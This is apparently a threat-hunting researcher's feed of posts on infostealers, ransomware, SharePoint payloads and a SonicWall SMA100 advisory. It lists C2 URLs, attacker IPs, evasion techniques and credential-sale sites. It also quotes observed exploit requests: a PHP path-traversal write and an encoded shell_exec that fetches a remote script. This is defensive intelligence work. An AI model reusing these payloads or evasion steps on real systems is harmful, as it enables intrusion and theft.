Cyb3rhawk

As recent SharePoint exploits settled a bit, I wanted to analyze payload variants to understand why attackers made specific choices. ASPX for quick access, DLLs for persistence, and IIS modules for blending in.

Soul instead of Shell — Payloads with Purpose What SharePoint’s RCE May Teach Us About Payload Design and Detection/Hunt Strategy

The goal of the blog (Soul instead of Shell) is to understand constraints that force payload decisions and how they can help us detect/hunt.
 Every payload has a soul - and understanding it makes us better hunters.

medium.com/@cyb3r-hawk/...

medium.com/me/stats/pos... medium.com/me/stats/pos...

(urlscan: page.url:http://bitbucket.org task.url:http://blogspot.com)
Hunt:
Who runs netsh + context?
How often Set-MpPreference is used?
Who creates exclusions, and when?

Key TTPs:
AMSI bypass (reflection, AMSIReaper, NukeAMSI)
COM hijacking for persistence
Defender exclusions (paths/exts/procs)
UAC bypass (EnableLUA)
Firewall off (netsh)
Set-MpPreference abuse
C2: Blogspot → bitbucket redirects

Recent #Xworm infections (esp. during tax season) follow a pattern:
mshta.exe → Scheduled Tasks → IEX execution.

#ThreatHunting #DetectionEngineering #MalwareAnalysis #DefenseEvasion

Credential sellers: DaisyCloud (also sells RedLine stealer logs), moderdolboeb, m3g4
Distribution Locations:https://t[.]me/+seHLUhOHbVhMDM0, breachforums, cracking[.]org,hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world,nulledbb[.]com, niflheim[.]world.

"A.P.E.X: Threat Hunting Through Structured Hypothesis Generation Our latest report on Hunters International ransomware provides several hypotheses you can implement in your environment. We want to reiterate the importance of integrating environmental context with t...

We will end with the Hunting Hypothesis using A.P.E.X (lnkd.in/gJ9BmStA) and Adversary infrastructure queries to discover Lumma panels, C2s, etc.

Telegram distribution via t[.]me/hitbase, t[.]me/sharmamod disguised as IPTV or Netflix access.

Lumma Stealer — Threat Hunting and Infrastructure Analysis We all heard of Lumma Stealer by now and how it has positioned itself as the top infostealer market share[1] after Mirai. Its initial…

Lumma Stealer is one of, if not the dominant, infostealer with a diverse distribution ecosystem from GitHub, Telegram, and multiple others. In this blog, we will look at distribution channels, credential sellers, and locations where logs are sold.

medium.com/@cyb3r-hawk/...

My next post is live. In this one, we will build upon our previous theoretical introduction of the LAYER approach and see its practical implementation using BlackBasta chatleaks - specifically related to "bypassing EDR."
#cybersecurity #threathunting #thrunting #THORcollective

I had fun writing this. See how treating "bypass" as a single technique creates blind spots in our hunting. We will continue this with a practical example using Blackbasta leaks
#infosec #threathunting #thrunting #blueteam #threatdetection #THORcollective

A ransomware strain ("SuperBlack") by actor "Mora_001" is currently targeting two recent Fortinet zero-day vulnerabilities (CVE-2024-55591 and CVE-2025-24472). I investigated multiple intrusions between January and March, and most of them have a similar attack chain.
Read it at lnkd.in/g5fefgbq

Glad to have been featured in the Cyber Focus podcast for allowing me to comment on our 2024 Threat Roundup report. we discussed Key findings, Threats to critical infrastructure, OT security risks, and Threat hunting frameworks and cyber resilience
Check it out:
youtu.be/ndOpYFiabbc?...

45.89.196.11
37.27.63.3
45.89.196.115 (reported in the past)

Will blog on more details.

4) hxxp://45.89.196[.]115/core/sendPart - C2
Adversary Infra:

37.27.63.3:443 (kyfjlijv[.]ru) -
84.200.154.182 (not detected by VT yet)
smkuksool[.]com
2a01:4f9:3081:3098:0:0:0:2
services.ssh.server_host_key.fingerprint_sha256: 92709a98601c28a87fa307e63ae8bc60f870c6b9533a2d50bdb2c16fda205c37

IP:
1) 45.89.196[.]115 - C2 and stealer panel
2) 104.22.0[.]232 - cutt[.]ly (Cloudflare)
1) hxxps://cutt[.]ly/guessintegrates - (initial URL)
2) hxxps://kyfjlijv[.]ru/guessintegrates.bat (Initial stage BAT file generated with Kodiac and zip file)
3) hxxp://45.89.196[.]115/core/createSession - C2

Amatera Stealer:
Following the trend of infostealers, while a recent campaign of AMOS stealer targeted macOS users (lnkd.in/gD8Da4mv), a new Windows-focused stealer called Amatera was observed during my recent intrusion analysis.
#Amatera #infoStealer #windows #telegram #crypto #cyber #security

Wrote something on Atomic infostealers latest attempt to infect Mac users through cloned brew site and malicious curl command. medium.com/@cyb3r-hawk/...

#macos #Atomic #infostealer #MachO #brew #SEO #google #ads #telegram #google #Chromium #crypto #wallet #cyber #security #site #impersonation

For some folks, Threat hunting research might lack a structured approach, leading to scattered and inefficient processes. This lack of structure hinders building upon previous hunts and scaling the threat hunting process effectively.
#ThreatHunting #Research #Cybersecurity
medium.com/p/90e020ffcf...

Had fun writing on Chaya_003, targeting engineering workstations. It evolved from a process-killing executable analysis to an interesting investigation. The blend of technical, geopolitical, and IT-OT aspects made it even more interesting
lnkd.in/g55hiBcP

#ICS #engineering #workstations #Discord

Not every anomaly is malicious. In the post, I go over how to define success criteria and how you can embrace "false positives" when performing threat-hunting. I used user-agents analysis as an example to try and drive it home. open.substack.com/pub/cyb3rsec...

#threathunting

In my latest blog post, I showed how to use user-agent analysis in threat-hunting to spot suspicious patterns and unauthorized software using environmental knowledge and known-normal
open.substack.com/pub/cyb3rsec...

#ThreatHunting #Detection #Engineering #User #agent #analysis

Required Actions:
- Update systems to version 10.2.1.14-75sv or higher
- Review and implement geographic access controls
- Enable multi-factor authentication for all users
- Scan appliance for unauthorized web shells
- Check for connections originating from the appliance

IP addresses from:
- United States
- The Netherlands
- Russia
ASN providers:
- 3xK Tech GmbH
- Namecheap, Inc.
- Comcast Cable Communications, LLC
- Additional regional ISPs

- Insert PHP code for execution
<host>:443/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&amp;+config-create+/&amp;/&lt;?echo(md5(&quot;hi&quot;));?&gt;+/tmp/index1.php

- Execute system commands
<host>:443/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input rule-match="<?php shell_exec(base64_decode("wd0kkgn1cmwgahr0cdovlzk0lje1ni4xnzcumta5l3noihx8ihdnzxqgahr0cdovlzk0lje1ni4xnzcumta5l3noic1plsk"

The exploitation attempts include:

- Access system files remotely
 A variant of the Mirai bot was observed attempting to access /etc/passwd through: <host>:443/cgi-bin/jarrewrite.sh
Sample hash: 464b397279bcf2d0e5ac86776166a7ca808d87570e87e37e5290b6b290ac1fc5

Current Activity:
We are observing multiple attack patterns against these devices. Password spraying attempts show testing admin/administrator credentials with a small set of unknown user names

SonicWall released an advisory on December 4th, SNWLID-2024-0018, that affects several SMA 100 Series devices. These devices include 500v, SMA 200, 210, 400, and 410 models running versions 10.2.1.13-72sv and earlier.

#CVE #SonicWall #SMA100 #ThreatIntel #SSL #VPN #vulnerabilities